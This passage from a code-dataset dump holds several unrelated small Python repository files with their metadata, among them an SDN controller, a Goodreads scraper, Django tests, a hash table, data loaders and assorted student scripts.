IPAddr(\"10.0.0.4\")\n\t\t\tmsg.actions.append(of.ofp_action_output(port = 4))\n\t\t\tevent.connection.send(msg)\n\n\t\tdef host3():\n\t\t\tmsg = of.ofp_flow_mod()\n\t\t\tmsg.match.in_port = 3\n\t\t\tmsg.match.nw_dst = IPAddr(\"10.0.0.1\")\n\t\t\tmsg.actions.append(of.ofp_action_output(port = 1))\n\t\t\tevent.connection.send(msg)\n \n\t\tdef host4():\n\t\t\tmsg = of.ofp_flow_mod()\n\t\t\tmsg.match.in_port = 4\n\t\t\tmsg.match.nw_dst = IPAddr(\"10.0.0.2\")\n\t\t\tmsg.actions.append(of.ofp_action_output(port = 
2))\n\t\t\tevent.connection.send(msg)\n\n\t\thost1()\n\t\thost2()\n\t\thost3()\n\t\thost4()\n\t\t\n\ndef launch():\n\tprint(\"CHRIS IS UP\")\n\tcore.registerNew( Chris )\n\t","repo_name":"Paul-weqe/pox-controllers","sub_path":"acl.py","file_name":"acl.py","file_ext":"py","file_size_in_byte":1172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"14937235894","text":"from bs4 import BeautifulSoup\nimport itertools\nimport urllib.request\nimport requests, json, csv\n\nGOODREADS_URL = 'https://www.goodreads.com/review/list/62504919-cameron-milne?' #Replace with your link\n\n### GoodReads Data\ndef scrape_goodreads_page(url, page_number):\n '''Scrapes GoodReads reading history into a dictionary\n\n This function takes in a particular page of one's GoodReads reading history\n and scrapes relevant statistics for every book on that page. \n\n Parameters\n ----------\n URL of page\n\n Returns:\n -------\n List of lists; all lists within the list are an individual book and its data\n '''\n\n page_number_string = 'page=' + str(page_number)\n PAGE_URL = url + page_number_string\n\n page = requests.get(PAGE_URL)\n soup = BeautifulSoup(page.content, 'html.parser')\n tables = soup.find_all('table')\n #print(len(soup.find_all('table'))) #There are 2 tables; the books are in the second\n book_table = tables[1]\n\n #Headers: Working!\n headers = []\n column_headers = book_table.find_all('th')\n for column in column_headers:\n headers.append(column['alt'])\n\n #Rows\n page_list = []\n table_rows = book_table.find_all('tr')\n for row in table_rows[1:]:\n\n #Title: Needs edits\n childTag = row.find(class_='field title').find('div').find('a').find('span')\n if childTag:\n title_mess = row.find(class_='field title').find('div').text.strip()\n indented_list = title_mess.splitlines()\n new_list = []\n for line in indented_list:\n new_line = line.strip()\n new_list.append(new_line)\n title = ' '.join(new_list)\n else:\n title = row.find(class_='field title').find('div').find('a').text.strip()\n\n\n #Column Extraction\n author = row.find(class_='field author').find('div').find('a').text.strip()\n isbn = row.find(class_='field isbn').find('div').text.strip()\n isbn13 = row.find(class_='field isbn13').find('div').text.strip()\n num_pages_string = row.find(class_='field num_pages').find('div').text.strip()\n num_pages = ''.join(i for i in num_pages_string if i.isdigit())\n avg_rating = row.find(class_='field avg_rating').find('div').text.strip()\n num_ratings = row.find(class_='field num_ratings').find('div').text.strip()\n num_ratings_converted = int(num_ratings.replace(',', ''))\n date_pub = row.find(class_='field date_pub').find('div').text.strip()\n date_pub_edition = row.find(class_='field date_pub_edition').find('div').text.strip()\n rating = row.find(class_='field rating').find('div').text.strip()\n\n #Shelves: Needs to be Checked\n shelves = row.find(class_='field shelves').find('div').find('a').text.strip()\n\n read_count = row.find(class_='field read_count').find('div').text.strip()\n date_started = row.find(class_='field date_started').find('div').find('span').text.strip()\n date_read = row.find(class_='field date_read').find('div').find('span').text.strip()\n date_added = row.find(class_='field date_added').find('div').find('span').text.strip()\n\n #adding to list\n row_list = []\n row_list.append(title)\n row_list.append(author)\n row_list.append(isbn)\n row_list.append(isbn13)\n row_list.append(num_pages)\n row_list.append(avg_rating)\n 
row_list.append(num_ratings_converted)\n row_list.append(date_pub)\n row_list.append(date_pub_edition)\n row_list.append(rating)\n row_list.append(shelves)\n row_list.append(read_count)\n row_list.append(date_started)\n row_list.append(date_read)\n row_list.append(date_added)\n\n #Appending row data to the list of rows for a single page\n page_list.append(row_list)\n return page_list\n\ndef combine_page_lists(library_list):\n '''Combine Collections of Lists by Page\n\n Takes a list of lists and combines those lists into one using\n the itertools library.\n\n Parameters\n ----------\n library_list: a list of lists\n\n returns\n -------\n list: flattened list\n '''\n flatten = itertools.chain.from_iterable\n return list(flatten(library_list))\n\ndef convert_list_to_csv(one_big_list):\n '''Converts the flattened list a CSV file\n\n Takes a list of values and writes them to a CSV file\n\n Parameters\n ----------\n one_big_list: a specific list produced from combine_page_lists()\n\n returns:\n --------\n CSV file: 'ReadingHistory.csv'\n '''\n fields = [\n 'Title',\n 'Author',\n 'ISBN',\n 'IBSN13',\n 'Number of Pages',\n 'Average Rating',\n 'Number of Ratings',\n 'Publish Date',\n 'Publish Date Edition',\n 'My Rating',\n 'Shelves',\n 'Read Count',\n 'Date Started',\n 'Date Read',\n 'Date Added',\n ]\n\n filename = 'ReadingHistory.csv'\n with open(filename, 'w', newline='', encoding='utf-8') as csvfile:\n csvwriter = csv.writer(csvfile) # creating a csv writer object\n csvwriter.writerow(fields) # writing the fields\n csvwriter.writerows(one_big_list) # writing the data rows\n\nif __name__ == \"__main__\":\n\n print(f\"\")\n print(f\"This program could take several minutes to complete:\")\n print(f\"\")\n\n #Calling functions\n goodreads_page_data = scrape_goodreads_page(GOODREADS_URL, 1)\n #print(goodreads_page_data)\n\n #Scrape all pages and add to a list:\n entire_library = []\n num_of_pages_in_library = 30 #Assumes 30 books per page for now, need to figure out how to make the loop dynamic.\n\n for i in range(num_of_pages_in_library):\n goodreads_page_data = scrape_goodreads_page(GOODREADS_URL, page_number=i)\n entire_library.append(goodreads_page_data)\n #print(len(entire_library))\n\n combined_lists = combine_page_lists(entire_library)\n convert_list_to_csv(combined_lists)","repo_name":"ccmilne/GoodReads_Parser","sub_path":"GoodReads_Parser.py","file_name":"GoodReads_Parser.py","file_ext":"py","file_size_in_byte":5969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"12836805953","text":"from django.test import TestCase\nfrom ..functions.timeobjects import *\n\nfrom unittest import mock\nimport datetime\n\n# test timeObject class\nclass test_timeObject(TestCase):\n # test the getDate function for timeObject\n def test_getDate(self):\n date = 20180917\n self.assertEqual(timeObject(date).getDate(), date)\n date = 12002030\n self.assertEqual(timeObject(date).getDate(), date)\n date = 50000101\n self.assertEqual(timeObject(date).getDate(), date)\n date = 00000000\n self.assertEqual(timeObject(date).getDate(), date)\n\n # test the weekday function for timeObject\n def test_weekday(self):\n date = 20180917 # Monday\n self.assertEqual(timeObject(date).weekday(), 0)\n date = 20180911 # Tuesday\n self.assertEqual(timeObject(date).weekday(), 1)\n date = 20180919 # Wednesday\n self.assertEqual(timeObject(date).weekday(), 2)\n date = 20180906 # Thursday\n self.assertEqual(timeObject(date).weekday(), 3)\n date = 20180914 # Friday\n 
self.assertEqual(timeObject(date).weekday(), 4)\n date = 20180901 # Saturday\n self.assertEqual(timeObject(date).weekday(), 5)\n date = 20180930 # Sunday\n self.assertEqual(timeObject(date).weekday(), 6)\n\n# test givenTime object\nclass test_givenTime(TestCase):\n # test the creation of the givenTime object with YMD type\n def test_givenTimeCreationYMD(self):\n inputtedDate = '2018-09-17'\n date = 20180917\n self.assertEqual(givenTime(inputtedDate, \"YMD\").getDate(), date)\n inputtedDate = '1200F20930'\n date = 12002030\n self.assertEqual(givenTime(inputtedDate, \"YMD\").getDate(), date)\n inputtedDate = '5000101W01'\n date = 50000101\n self.assertEqual(givenTime(inputtedDate, \"YMD\").getDate(), date)\n inputtedDate = '0000X00P00'\n date = 00000000\n self.assertEqual(givenTime(inputtedDate, \"YMD\").getDate(), date)\n\n # test the creation of the givenTime object with DMY type\n def test_givenTimeCreationDMY(self):\n inputtedDate = '17-09-2018'\n date = 20180917\n self.assertEqual(givenTime(inputtedDate, \"DMY\").getDate(), date)\n inputtedDate = '30F2091200'\n date = 12002030\n self.assertEqual(givenTime(inputtedDate, \"DMY\").getDate(), date)\n inputtedDate = '01101W5000'\n date = 50000101\n self.assertEqual(givenTime(inputtedDate, \"DMY\").getDate(), date)\n inputtedDate = '00X00P0000'\n date = 00000000\n self.assertEqual(givenTime(inputtedDate, \"DMY\").getDate(), date)\n\nclass test_currentTime(TestCase):\n\n def test_currentTimeCreation(self):\n with mock.patch('datetime.datetime') as dt_mock:\n dt_mock.now.return_value.strftime.return_value = '20060204'\n date = 20060204\n self.assertEqual(currentTime().getDate(), date)\n\n dt_mock.now.return_value.strftime.return_value = '30061201'\n date = 30061201\n self.assertEqual(currentTime().getDate(), date)\n\n dt_mock.now.return_value.strftime.return_value = '23060131'\n date = 23060131\n self.assertEqual(currentTime().getDate(), date)\n\n dt_mock.now.return_value.strftime.return_value = '20180917'\n date = 20180917\n self.assertEqual(currentTime().getDate(), date)\n","repo_name":"rdugg4/IFB299-Group-70-S.K.R.A.M","sub_path":"SKRAM70/testApp/tests/test_timeObjects.py","file_name":"test_timeObjects.py","file_ext":"py","file_size_in_byte":3390,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"85"} +{"seq_id":"70870908758","text":"from enum import Enum\r\n\r\n\r\nclass Node:\r\n def __init__(self):\r\n self.value = None\r\n self.key = None\r\n self.FREE = True\r\n self.DELETED = False\r\n self.TAKEN = False\r\n\r\n\r\ndef hash(key, n):\r\n idx = 0\r\n for ch in key:\r\n idx += ord(ch) * 37\r\n idx %= n\r\n return idx\r\n\r\n\r\ndef insert(arr, val, key, n):\r\n idx = hash(key, n)\r\n for i in range(n):\r\n idx += 37 # 37 i n są względnie pierwsze, bo n jest potega dwojki\r\n idx %= n\r\n if arr[idx].FREE or arr[idx].DELETED:\r\n arr[idx].value = val\r\n arr[idx].key = key\r\n\r\n arr[idx].TAKEN = True\r\n arr[idx].FREE = False\r\n arr[idx].DELETED = False\r\n return\r\n print(\"Tablica jest przepełniona\")\r\n\r\n\r\ndef remove(arr, key, n):\r\n idx = hash(key, n)\r\n for i in range(n):\r\n idx += 37\r\n idx %= n\r\n if arr[idx].FREE:\r\n break\r\n if arr[idx].key == key:\r\n arr[idx].TAKEN = False\r\n arr[idx].DELETED = True\r\n return\r\n print(\"Nie znaleziono klucza!\")\r\n\r\n\r\ndef find(arr, key, n):\r\n idx = hash(key, n)\r\n for i in range(n):\r\n idx += 37\r\n idx %= n\r\n if arr[idx].FREE:\r\n break\r\n if arr[idx].key == key and arr[idx].TAKEN:\r\n print(\"Val [\", key, \"]:\", 
arr[idx].value)\r\n return\r\n print(\"Nie znaleziono klucza!\")\r\n\r\n\r\ndef pow2(n):\r\n l = 1\r\n while l < n:\r\n l *= 2\r\n return l\r\n\r\n\r\nwhile True:\r\n\r\n n = int(input(\"How big table?\"))\r\n n = pow2(n)\r\n to_add = int(input(\"How many add?\"))\r\n to_remove = int(input(\"How many remove?\"))\r\n to_find = int(input(\"How many find\"))\r\n\r\n array = [Node() for _ in range(n)]\r\n\r\n for i in range(to_add):\r\n key = input(\"Enter the key to add:\")\r\n val = int(input(\"Enter the value to add:\"))\r\n insert(array, val, key, n)\r\n\r\n for i in range(to_remove):\r\n key = input(\"Enter the key to remove:\")\r\n remove(array, key, n)\r\n\r\n for i in range(to_find):\r\n key = input(\"Enter the key to find: \")\r\n find(array, key, n)\r\n break\r\n\r\n","repo_name":"delekta/agh-asd","sub_path":"3.data-structures/hash-table/hash_table.py","file_name":"hash_table.py","file_ext":"py","file_size_in_byte":2158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"39360552893","text":"from dataclasses_avroschema import AvroModel\n\nfrom kstreams import ConsumerRecord\n\n\nclass AvroSerializer:\n async def serialize(self, instance: AvroModel, **kwargs) -> bytes:\n \"\"\"\n Serialize an AvroModel to avro-binary\n \"\"\"\n return instance.serialize()\n\n\nclass AvroDeserializer:\n def __init__(self, *, model: AvroModel) -> None:\n self.model = model\n\n async def deserialize(\n self, consumer_record: ConsumerRecord, **kwargs\n ) -> ConsumerRecord:\n \"\"\"\n Deserialize a payload to an AvroModel\n \"\"\"\n if consumer_record.value is not None:\n data = self.model.deserialize(consumer_record.value)\n consumer_record.value = data\n return consumer_record\n","repo_name":"kpn/kstreams","sub_path":"examples/dataclasses-avroschema-example/dataclasses_avroschema_example/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"85"} +{"seq_id":"21678470044","text":"# -*- coding: utf-8 -*-\n\"\"\"\nAuthor: easy00000000\nVersion: 0.10\nDate: 2018-01-05\n\"\"\"\n\nimport numpy as np\nimport statsmodels.formula.api as smf\n\ndef real_trend(bi, v=1.0):\n t = np.zeros(len(bi))\n p = 0\n for i in range(1,len(bi)):\n if bi[i-1] > 0:\n p = -v\n elif bi[i-1] < 0:\n p = v\n t[i] = p\n return t\n\ndef strong(bi, tr=None, t=0.02, v=0.5):\n s = np.zeros(len(bi))\n pos1 = 0\n for i in range(1,len(bi)): \n if bi[i]>0: \n if -bi[i]/bi[pos1]-1>t:\n for j in range(pos1+1,i+1):\n s[j] = v\n pos1 = i\n elif bi[i]<0:\n if -bi[pos1]/bi[i]-1>t:\n for j in range(pos1+1,i+1):\n s[j] = -v\n pos1 = i\n if tr is not None:\n for i in range(len(bi)):\n if tr[i]>0 and s[i]<0:\n s[i] = 0.\n elif tr[i]<0 and s[i]>0:\n s[i] = 0. 
\n return s\n\ndef est_trend_1(pl, v=1.0):\n # slope\n t = np.zeros(len(pl))\n slope = np.zeros(len(pl))\n dw=5\n x=np.arange(1,dw+1)/100.0\n for i in range(dw,len(slope)):\n #y = pl[i-dw+1:i+1].values / pl[i-dw+1:i+1].values.mean() - 1\n y = pl[i-dw+1:i+1] / pl[i-dw+1:i+1].mean() - 1\n model = smf.OLS(y,x)\n results = model.fit() \n slope[i] = results.params\n for i in range(dw, len(pl)):\n if slope[i]>=0:\n t[i] = v\n else:\n t[i] = -v\n return t, slope\n\ndef est_trend_2(pl, bolu, bold, v=1.0):\n # boll\n t = np.zeros(len(pl)) \n for i in range(0, len(pl)):\n if pl[i] > bolu[i]:\n t[i] = v\n elif pl[i] < bold[i]:\n t[i] = -v\n return t\n\ndef est_trend_3(pl, v=1.0):\n t = np.zeros(len(pl)) \n for i in range(0, len(pl)):\n if pl[i] >= 0:\n t[i] = v\n elif pl[i] < 0:\n t[i] = -v\n return t\n\ndef get_match_trend(real_trend, est_trend, *args, **kwargs):\n up_trend_match = 0\n up_trend_mismatch = 0\n down_trend_match = 0\n down_trend_mismatch = 0\n for i in range(0, len(real_trend)):\n if real_trend[i] > 0:\n if est_trend[i] > 0:\n up_trend_match = up_trend_match + 1\n else:\n up_trend_mismatch = up_trend_mismatch + 1\n elif real_trend[i] < 0:\n if est_trend[i] < 0:\n down_trend_match = down_trend_match + 1\n else:\n down_trend_mismatch = down_trend_mismatch + 1\n total_up = up_trend_match + up_trend_mismatch\n total_down = down_trend_match + down_trend_mismatch\n up_match = up_trend_match / total_up\n up_mismatch = up_trend_mismatch / total_up\n down_match = down_trend_match / total_down\n down_mismatch = down_trend_mismatch / total_down\n return [up_match, up_mismatch, down_match, down_mismatch]\n\ndef display_match_trend(match_trend):\n up_match=match_trend[0]/(match_trend[0]+match_trend[3])\n up_mismatch=match_trend[1]/(match_trend[1]+match_trend[2])\n down_match=match_trend[2]/(match_trend[1]+match_trend[2])\n down_mismatch=match_trend[3]/(match_trend[0]+match_trend[3])\n title_trend = '{:20}'.format('Macth Ratio:') + \\\n '{:20}'.format('est_up_trend') + \\\n '{:20}'.format('est_down_trend')\n up_trend_match ='{:20}'.format('real_up_trend') + \\\n '{:20}'.format('%0.2f%%' %(up_match*100)) + \\\n '{:20}'.format('%0.2f%%' %(up_mismatch*100))\n down_trend_match = '{:20}'.format('real_down_trend') + \\\n '{:20}'.format('%0.2f%%' %(down_mismatch*100)) + \\\n '{:20}'.format('%0.2f%%' %(down_match*100))\n prn_txt = title_trend + '\\n' + \\\n up_trend_match + '\\n' + \\\n down_trend_match\n \n return prn_txt","repo_name":"easy00000000/working_tencent_cloud","sub_path":"HK_Trade/Algorithm/mkstatus.py","file_name":"mkstatus.py","file_ext":"py","file_size_in_byte":3887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"41340293357","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nSpyder Editor\r\n\r\nThis is a temporary script file.\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport numpy.matlib\r\nimport matplotlib.pyplot as plt\r\nimport os\r\nimport re\r\nimport string\r\n\r\ndata=open(r\"C:\\Users\\20115\\Downloads\\Health-News-Tweets\\Health-Tweets\\bbchealth.txt\",\"r\") \r\nfor line in data:\r\n #remove id and timestamp\r\n data = line.split(\"|\")\r\n data=data[2]\r\n #remove hash\r\n data=data.replace(\"#\",\"\")\r\n #remove url\r\n data = re.sub(r\"http\\S+\", \"\", data)\r\n data = re.sub(r\"www\\S+\", \"\", data)\r\n #convert to lowercase\r\n data=data.lower()\r\n #remove words that starts with @\r\n data = re.sub(r\"@\\S+\", \"\", data)\r\n #remove @\r\n data=data.replace(\"@\",\"\")\r\n\r\n print(data)\r\n 
\r\n\r\ndef jaccard(a , b):\r\n #calculating the intersection bet elements of set a amd set b\r\n intersection = list(set(a) & set(b))\r\n #grouping both elements of set a amd set b without repetition\r\n union = list(set(a) | set(b))\r\n #calc. jaccard distance \r\n distance = len(intersection)/len(union)\r\n return distance\r\n\r\n\r\n#we need to get the nearest centroid to each training example\r\ndef assign_clusters(centroids, cluster_array):\r\n#value of each centroid (K , n)\r\n ExamplesCentroids = []\r\n\r\n for i in range(len(cluster_array)):\r\n z=10000000\r\n index = -1\r\n for j in range(len(centroids)): \r\n dis = jaccard(cluster_array[i],centroids[j]) \r\n if dis < z :\r\n z = dis\r\n index = j\r\n ExamplesCentroids.append(index)\r\n\r\n return ExamplesCentroids \r\n\r\ndef calc_centroids(X, ExamplesCentroids, K):\r\n m, n = X.shape\r\n Centroids = np.zeros((K, n))\r\n #select the centriod for cluster\r\n for i in range(K) : \r\n min_dis_sum = 0\r\n Centroids_indx=-1\r\n #store distance \r\n min_dis_dp=[]\r\n for p1 in range(K[i]):\r\n min_dis_dp.append([])\r\n dis_sum=0\r\n # sum for every distances of tweet p1 with every tweet p2 in the same cluster\r\n for p2 in range(K[i]):\r\n if p1 != p2:\r\n if p1 < p2:\r\n cent_dis = min_dis_dp[p1][p2]\r\n else:\r\n cent_dis= jaccard(K[i][p2][0], K[i][p1][0])\r\n min_dis_dp[p2].append(cent_dis)\r\n dis_sum += cent_dis\r\n else:\r\n min_dis_dp.append(0)\r\n # select the minimum sum of distance as a centroid \r\n if dis_sum < min_dis_sum:\r\n min_dis_sum = dis_sum\r\n Centroids_indx=p2\r\n \r\n # append the selected tweet to the centroid list\r\n Centroids.append(K[i][Centroids_indx][0])\r\n \r\n return Centroids\r\n\r\n","repo_name":"Roma927/tweets","sub_path":"Project_AI/AI_project.py","file_name":"AI_project.py","file_ext":"py","file_size_in_byte":2702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"71333293398","text":"'''\n1783. 병든 나이트\n처음엔 문제 이해가 잘 안됐는디.. 그래프 탐색인가 했는데 n, m 범위가 어마무시 해서 생각 고쳐 먹음.. 
심지어 O(n)도 안됨,,\n두뇌 게임 같은 문제 경우의 수를 잘 나누는 게 관건,,\n\n** 그리디 (가로 이동을 1로 할 경우 최대한 이동 가능하다는 점 착안, 세로/가로 길이에 따라 경우의 수 나누기)\n'''\n\n\ndef solution(n, m):\n if n == 1:\n return 1\n if n == 2:\n return min((m - 1) // 2 + 1, 4) # 최대 4번\n\n # n > 2 && m < 7 -> 최대 4번\n if m < 7:\n return min(m, 4)\n # n > 2 && m >= 7 -> 모든 이동 방법 사용 가능\n return 2 + (m - 4) # 처음 두번은 가로 2 이동 두 번, 나머지는 1 이동 방법으로 채우기\n\n\nn, m = map(int, input().split())\nprint(solution(n, m))\n","repo_name":"coding-test-study-room/repo","sub_path":"baekjoon/dldbdud314/week8/병든나이트.py","file_name":"병든나이트.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"29793855795","text":"from json import load, dump\nfrom os.path import exists, dirname\nfrom os import makedirs\n\nfrom time import struct_time, strftime\n\nclass SongList:\n \n \"\"\"This class basically provides a clean interface for accessing and\n manipulating the song list and handles the song file behind the\n scenes.\n \"\"\"\n \n def __init__(self, fpath):\n self.songfile = fpath\n if exists(fpath):\n self.load_list()\n else:\n self._id = 0\n self.songlist = []\n self.save_list()\n \n def __iter__(self):\n \"\"\"Iterate backwards through the songlist (most to least recent).\n \"\"\"\n self._index = len(self.songlist) - 1\n return self\n \n def __next__(self):\n if self._index < 0:\n raise StopIteration\n song = self.songlist[self._index]\n self._index -= 1\n return song\n \n def save_list(self):\n fdir = dirname(self.songfile)\n if fdir and not exists(fdir):\n makedirs(fdir)\n with open(self.songfile, 'w') as f:\n dump([self.songlist, self._id], f, indent=4)\n \n def load_list(self):\n with open(self.songfile, 'r') as f:\n try:\n self.songlist, self._id = load(f)\n except ValueError:\n # File is not valid JSON; just make an empty list\n self._id = 0\n self.songlist = []\n self.save_list()\n \n def add_song(self, song, rm_old=True):\n if rm_old:\n old_ids = []\n for s in self.songlist:\n if s['url'] == song['url']:\n old_ids.append(s['id'])\n for _id in old_ids:\n self.remove_song(_id)\n self.songlist.append(song)\n self.save_list()\n \n def remove_song(self, song_id):\n for s in self.songlist:\n if s['id'] == song_id:\n self.songlist.remove(s)\n self.save_list()\n return\n \n def clear_list(self):\n self.songlist = []\n self.save_list()\n \n def new_id(self):\n # Each song is to be given a unique ID number to make removal\n # easy.\n self._id += 1\n return self._id\n \n def timestring(self, ttuple):\n \"\"\"Take the tuple stored in the JSON file and turn it into a\n human readable string.\n \"\"\"\n return strftime('%a %d/%m/%Y at %H:%M:%S %Z', struct_time(ttuple))\n","repo_name":"bunburya/songlist","sub_path":"app/songhandler.py","file_name":"songhandler.py","file_ext":"py","file_size_in_byte":2486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"31387409108","text":"#多个图像按照z轴进行叠加,2D变成3D图像\n\nimport os\nfrom glob import glob\nimport SimpleITK as sitk\nimport nibabel as nib\nimport numpy as np\nimport re\n\nfrom PIL import Image\nimport numpy as np\nfrom scipy.ndimage import rotate\n\nsource_path=\"./output/sagittal/\"\nsave_path=\"./output\"\n\nfiles = glob(source_path+'/*.png')\n\ndef natural_sort(l): #排序\n convert = lambda text: int(text) if text.isdigit() else text.lower()\n alphanum_key = lambda key: [ convert(c) for c in re.split('([0-9]+)', key) ]\n return sorted(l, key = 
alphanum_key)\n\nfiles=natural_sort(files)\n# files.reverse()\n\n\n\nflag=True\nfor file in files:\n\n filename = os.path.basename(file)\n\n image = Image.open(file) # 用PIL中的Image.open打开图像 与原始图像不一致,是否是读取的问题\n image_arr = np.array(image) # 转化成numpy数组\n # image_arr = np.fliplr(image_arr) # 左右翻转\n # image_arr = np.rot90(image_arr, -1)\n\n\n\n if flag : #默认等于第一张的numpy矩阵\n data=image_arr\n flag=False\n else :\n # data_shape=data.shape\n # image_arr_shape = image_arr.shape\n\n data_dim=data.ndim\n image_dim=image_arr.ndim\n\n if data_dim ==2 :\n data = np.expand_dims(data, axis=2)\n\n if image_dim ==2 :\n image_arr = np.expand_dims(image_arr, axis=2)\n\n # image_arr = np.resize(image_arr, data_shape)\n # data=np.stack((data,image_arr),axis=2)\n\n data=np.concatenate((data, image_arr), axis = 2)\n\n\nprint(data.shape)\n\n# a = np.zeros((131,512,512)).astype(np.uint8)\n\n#数组变换\n#旋转\n# data = np.rot90(data,-1) #旋转90,负数顺时针\n\n#翻转\n# data=np.flipud(data) #上下翻转\n# data = np.fliplr(data) #左右翻转\n\n# data=np.flip(data,axis=0)\n# data=np.flip(data,axis=1)\n\n#维度交换\n\n# data = data.swapaxes(1,2)\ndata = data.swapaxes(0,2)\n\n#转置\n# data = data.transpose((0, 2, 1))\n# data = data.transpose((1, 2, 0))\n\n# data=data[:,::-1,:]\n\n\n\n# print(data.shape)\n\nimg = nib.Nifti1Image(data, np.eye(4))\n\nnib.save(img, os.path.join(save_path, 'sagittal.nii.gz'))\n","repo_name":"bigorgs/Medical-Tools","sub_path":"img2voxels.py","file_name":"img2voxels.py","file_ext":"py","file_size_in_byte":2154,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"39666026767","text":"def find_string_anagrams(str, pattern):\n result_indexes = []\n patternMap = {};\n matched = 0 ; \n start = 0;\n \n for char in pattern:\n if(char in patternMap):\n patternMap[char] +=1;\n else:\n patternMap[char] = 1;\n \n for idx,end in enumerate(str): \n if(end in patternMap):\n patternMap[end] -=1;\n if(patternMap[end] == 0):\n matched+=1; \n \n if(matched == len(patternMap)):\n result_indexes.append(start);\n \n if(idx - start + 1 == len(pattern)):\n if(str[start] in patternMap):\n if(patternMap[str[start]]==0):\n matched-=1;\n patternMap[str[start]]+=1;\n start+=1;\n\n return result_indexes;\n\n\n","repo_name":"Sumit2202/DataStructures-Algos","sub_path":"SlidingWindow/FindStringAnagrams.py","file_name":"FindStringAnagrams.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"43086444989","text":"\"\"\"\nMulti-EPL: Accurate Multi-Source Domain Adaptation\n\nAuthors:\n- Seongmin Lee (ligi214@snu.ac.kr)\n- Hyunsik Jeon (jeon185@gmail.com)\n- U Kang (ukang@snu.ac.kr)\n\nFile: src/loader/dataloader.py\n- Contains source code for setting Digits-Five dataset and dataloader\n\"\"\"\n\nimport numpy as np\nfrom torchvision import transforms\nfrom torch.utils.data import Dataset, DataLoader\n\nfrom loader.digits.mnist import load_mnist\nfrom loader.digits.mnist_m import load_mnist_m\nfrom loader.digits.svhn import load_svhn\nfrom loader.digits.synthdigits import load_synthdigits\nfrom loader.digits.usps import load_usps\n\ndigits_data_dir = '../../data/digits'\n\ndigits_transform = transforms.Compose([transforms.ToPILImage(),\n transforms.Resize((32, 32)),\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ])\n\n\nclass GeneralDataset(Dataset):\n \"\"\" General dataset for Digits-Five \"\"\"\n def __init__(self, images, labels, transform, target_train):\n super(GeneralDataset, 
self).__init__()\n self.images = images\n if target_train:\n self.labels = -np.ones_like(labels)\n else:\n self.labels = labels\n self.num_data = len(self.labels)\n self.transform = transform\n\n def __len__(self):\n return len(self.images)\n\n def __getitem__(self, idx):\n image = self.images[idx]\n label = int(self.labels[idx])\n if self.transform:\n image = self.transform(image)\n sample = {'image': image, 'label': label, 'index': idx}\n return sample\n\n\ndef get_digits_dataloader(name='MNIST', target=False, transform=digits_transform, batch_size=64, data_num=-1, data_dir=digits_data_dir):\n \"\"\"\n Get dataset and dataloader for a Digits-Five dataset\n :param name: name of the dataset (one of MNIST, MNIST-M, SVHN, SYN, and USPS)\n :param target: True if the requested dataset is target dataset\n :param transform: how to transform images\n :param batch_size: batch size for dataloader\n :param data_num: the number of training data\n :param data_dir: the directory where Digits-Five data are saved\n :return: Training dataset, Training dataloader, Test dataset, Test dataloader for the requested dataset\n \"\"\"\n if name == 'MNIST':\n print('Load MNIST data')\n train_data, test_data, train_label, test_label = load_mnist(data_dir, data_num)\n elif name == 'MNIST-M':\n print('Load MNIST-M data')\n train_data, test_data, train_label, test_label = load_mnist_m(data_dir, data_num)\n elif name == 'SVHN':\n print('Load SVHN data')\n train_data, test_data, train_label, test_label = load_svhn(data_dir, data_num)\n elif name == 'SYN':\n print('Load SYN data')\n train_data, test_data, train_label, test_label = load_synthdigits(data_dir, data_num)\n elif name == 'USPS':\n print('Load USPS data')\n train_data, test_data, train_label, test_label = load_usps(data_dir, data_num)\n else:\n raise ValueError('Name should be one of MNIST, MNIST-M, SVHN, SYN, and USPS')\n\n train_dataset = GeneralDataset(train_data, train_label, transform, target)\n test_dataset = GeneralDataset(test_data, test_label, transform, False)\n train_dataloader = DataLoader(train_dataset, batch_size=batch_size, shuffle=True, drop_last=True)\n test_dataloader = DataLoader(test_dataset, batch_size=batch_size, shuffle=False, drop_last=True)\n return train_dataset, train_dataloader, test_dataset, test_dataloader\n","repo_name":"snudatalab/MultiEPL","sub_path":"src/loader/dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":3631,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"27548074421","text":"import pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\nnum_interations_of_regression = 100\r\n\r\n# intercept\r\ntheta0 = 1\r\n# slope\r\ntheta1 = 1\r\n# learning rate\r\nalpha = 0.25\r\n\r\n# Reading Housing Data File\r\nfile = pd.read_csv('MLS.csv', delimiter=',') \r\n \r\ncomp_index = []\r\ncomp_benchmark_price = []\r\n\r\n# Scaling Factor of parameters\r\nindex_scaling_factor = 1000\r\nbenchmark_price_scaling_factor = 1000000\r\n\r\nfor input in range(0,len(file.iloc[:,0])):\r\n if 'Toronto' in file.iloc[input,0]:\r\n comp_index.append(file.iloc[:,1][input]/index_scaling_factor)\r\n comp_benchmark_price.append(file.iloc[:,2][input]/benchmark_price_scaling_factor)\r\n\r\ndata = []\r\nfor index in range (0, len(comp_index)):\r\n data.append([comp_index[index], comp_benchmark_price[index]])\r\n\r\nnum_rand_ints = 